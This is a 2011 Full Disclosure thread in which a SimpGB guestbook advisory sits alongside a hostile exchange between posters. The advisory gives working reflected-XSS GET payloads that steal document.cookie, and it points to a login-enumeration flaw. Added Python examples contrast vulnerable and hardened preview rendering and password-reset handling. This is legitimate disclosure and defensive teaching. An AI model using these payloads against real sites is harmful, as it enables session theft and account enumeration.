Full Disclosure mailing list archives

Re: Multiple vulnerabilities in SimpGB


From: "MustLive" <mustlive () websecurity com ua>
Date: Fri, 4 Feb 2011 23:49:42 +0200

Hello Laurent!

You are a very "intelligent" man, as I see from this and your previous letter
(in 2010).

You need to take into account the following:

1. I know better where to send.

2. If you write shitty stuff, it doesn't mean that others do the same.

3. No need to think and speak on behalf of other people - if it's not
interesting for you, it can still be interesting for others.

4. The main and obvious thing is that since 2006 I have written all my
advisories for those people who are interested in them (and there are such
people, as I know for sure). So if you or anybody else is not interested in
them, just skip them (and there is no need to write me nonsense) - I'm writing
my letters not for you, but for others who are interested in them and who
thank me for my work. It's strange that such an "intelligent" man as you
hasn't understood it for the last five years :-).

5. I don't need any non-serious letters from you, so don't waste your time
writing me anymore, because I've put your e-mail address on my blacklist.
Spend your time on good things.

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua

----- Original Message ----- 
From: laurent gaffie
To: MustLive
Cc: full-disclosure () lists grok org uk ; bugtraq () securityfocus com
Sent: Wednesday, January 26, 2011 5:09 PM
Subject: Re: [Full-disclosure] Multiple vulnerabilities in SimpGB


Send your shitty stuff to bugtraq () securityfocus com

If it's not obvious, no one gives a shit here, seriously.



2011/1/27 MustLive <mustlive () websecurity com ua>

Hello list!

I want to warn you about Cross-Site Scripting, Brute Force, Insufficient
Anti-automation and Abuse of Functionality vulnerabilities in SimpGB.

-------------------------
Affected products:
-------------------------

SimpGB v1.49.02 and previous versions are vulnerable.

----------
Details:
----------

XSS (WASC-08):

POST request to the page http://site/guestbook.php in the parameters poster,
postingid and location of the Preview function. If a captcha is used in the
guestbook, then a valid captcha code is required for the attack. Or via GET
request:

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1&input_text=111111111111111111111111111111&preview=preview

http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&input_text=111111111111111111111111111111&preview=preview

Brute Force (WASC-11):

http://site/admin/index.php

Insufficient Anti-automation (WASC-21):

http://site/admin/pwlost.php

In this functionality there is no protection against automated requests
(captcha).

Abuse of Functionality (WASC-42):

http://site/admin/pwlost.php

In this functionality it's possible to retrieve logins.

------------
Timeline:
------------

2010.11.17 - announced at my site.
2010.11.19 - informed developers.
2011.01.25 - disclosed at my site.

I mentioned these vulnerabilities on my site
(http://websecurity.com.ua/4690/).

Best wishes & regards,
MustLive
Administrator of Websecurity web site
http://websecurity.com.ua


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/



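The following is an added example and is not SimpGB's code or anything posted in the thread. It models the reflected XSS the advisory reports in the guestbook.php Preview function beside an escaped rendering. The advisory's three GET payloads are used as test input; because the postingid and location payloads begin with %22%3E ('">') while the poster payload carries no breakout prefix, the example assumes the first two land inside quoted HTML attributes and the last in a text context. That markup is an assumption, not SimpGB's template. The extra event-handler payload and the "half-escaped" renderer go beyond the advisory to show why quoting must be escaped as well as angle brackets.

```python
"""Added example (not SimpGB's code): reflected preview parameters rendered
unescaped, half-escaped and fully escaped. The preview layout is an
assumption inferred from the shape of the advisory's payloads.
"""
from html import escape
from urllib.parse import parse_qs, urlsplit

# The three GET requests quoted in the advisory, used here only as test input.
ADVISORY_URLS = [
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster="
    "%3Cscript%3Ealert(document.cookie)%3C/script%3E"
    "&input_text=111111111111111111111111111111&preview=preview",
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid="
    "%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E&poster=1"
    "&input_text=111111111111111111111111111111&preview=preview",
    "http://site/guestbook.php?layout=Til&lang=en&mode=add&postingid=1&poster=1"
    "&location=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E"
    "&input_text=111111111111111111111111111111&preview=preview",
]

REFLECTED = ("poster", "postingid", "location")

# Constructed payload (not from the advisory) for the attribute-context check.
ATTR_PAYLOAD = {"poster": "x", "postingid": '" onfocus="alert(1)" autofocus="', "location": "x"}


def preview_params(url):
    """Pull the three reflected parameters out of a preview request, URL-decoded."""
    qs = parse_qs(urlsplit(url).query, keep_blank_values=True)
    return {name: qs.get(name, [""])[0] for name in REFLECTED}


def _layout(poster, postingid, location):
    # Assumed preview fragment: two quoted-attribute contexts and one text context.
    return (
        f'<input type="hidden" name="postingid" value="{postingid}">\n'
        f'<b>{poster}</b> from <input type="text" name="location" value="{location}">'
    )


def render_preview_unescaped(params):
    """Vulnerable: values are interpolated verbatim, as the advisory's payloads imply."""
    return _layout(params["poster"], params["postingid"], params["location"])


def render_preview_half_escaped(params):
    """Common mistake: escaping only '<', '>' and '&' (quote=False) protects the
    text context but leaves the attribute contexts open to a '"' breakout."""
    half = {name: escape(value, quote=False) for name, value in params.items()}
    return _layout(half["poster"], half["postingid"], half["location"])


def render_preview_escaped(params):
    """Hardened: escape(quote=True) also turns '"' into &quot;, so the same
    template is safe in both the text and the quoted-attribute contexts."""
    safe = {name: escape(value, quote=True) for name, value in params.items()}
    return _layout(safe["poster"], safe["postingid"], safe["location"])


def script_reflected(rendered):
    """True if a literal <script> element survives in the rendered preview."""
    return "<script>" in rendered.lower()


def attribute_breakout(rendered, marker='" onfocus="'):
    """True if a quote-terminated event handler survives inside the markup."""
    return marker in rendered


if __name__ == "__main__":
    for url in ADVISORY_URLS:
        p = preview_params(url)
        print("unescaped:", script_reflected(render_preview_unescaped(p)),
              "escaped:", script_reflected(render_preview_escaped(p)))
    print("half-escaped attr breakout:", attribute_breakout(render_preview_half_escaped(ATTR_PAYLOAD)))
```

The point of the third renderer is that the advisory's own payloads would already be stopped by escaping angle brackets alone, which is why the two attribute-context findings matter: a payload that never uses `<` or `>` still breaks out of the attribute unless the quote character is escaped for that context.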

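A second added example, again not SimpGB's code, covers the two admin/pwlost.php findings (logins can be retrieved; no protection against automated requests). It shows a "lost password" handler in the leaky form the advisory describes beside a hardened form that answers with one fixed message and applies a per-client rate limit. The rate limit is a substitute for the captcha the advisory mentions, chosen because it can be shown offline, and the same limiter would cover the admin/index.php login form the brute-force finding points at. Account store, messages, limits and the injectable clock are all constructed for the example.

```python
"""Added example (not SimpGB's code): a lost-password handler written two
ways. pwlost_leaky() answers differently for known and unknown logins and
never refuses a request; pwlost_hardened() returns one message on every path
and rate-limits by client key. All data here is constructed.
"""
import secrets
import time
from collections import defaultdict, deque

# Constructed account store: login -> registered e-mail address.
ACCOUNTS = {
    "admin": "admin@example.invalid",
    "editor": "editor@example.invalid",
}

GENERIC = "If that login exists, a reset message has been sent to its registered address."


def pwlost_leaky(login):
    """Leaky pattern: the reply reveals whether `login` exists, and nothing slows
    down a script that walks a wordlist through the form."""
    address = ACCOUNTS.get(login)
    if address is None:
        return "Unknown login."
    return f"A new password has been sent to {address}."


class RateLimiter:
    """Sliding-window limiter: at most `limit` calls per `window_s` seconds per key.
    `clock` is injectable so the behaviour can be tested without waiting."""

    def __init__(self, limit, window_s, clock=time.monotonic):
        self.limit = limit
        self.window_s = window_s
        self.clock = clock
        self._hits = defaultdict(deque)

    def allow(self, key):
        now = self.clock()
        hits = self._hits[key]
        while hits and now - hits[0] >= self.window_s:
            hits.popleft()  # drop timestamps that fell out of the window
        if len(hits) >= self.limit:
            return False
        hits.append(now)
        return True


LIMITER = RateLimiter(limit=5, window_s=600)


def pwlost_hardened(login, client_ip, send_mail, limiter=LIMITER):
    """Hardened pattern: the same message on every path, so neither the account
    lookup nor the rate limit becomes an oracle. `send_mail(address, body)` is
    the caller-supplied delivery hook; a real handler would also persist the
    token and check it when the reset link is used (omitted here)."""
    token = secrets.token_urlsafe(32)  # generated on every path to equalise work
    if limiter.allow(client_ip):
        address = ACCOUNTS.get(login)
        if address is not None:
            send_mail(address, f"Password reset token: {token}")
    return GENERIC


if __name__ == "__main__":
    print(pwlost_leaky("admin"))
    print(pwlost_leaky("nobody"))
    hook = lambda address, body: print("mail ->", address)
    print(pwlost_hardened("admin", "203.0.113.7", hook))
    print(pwlost_hardened("nobody", "203.0.113.7", hook))
```

Two caveats a practitioner would add: a fixed message removes the content oracle but not a timing oracle, so the hardened path does the same token generation whether or not the login exists; and a limit keyed only on client address is weak against an attacker with many addresses, so the same limiter is normally also keyed on the target login.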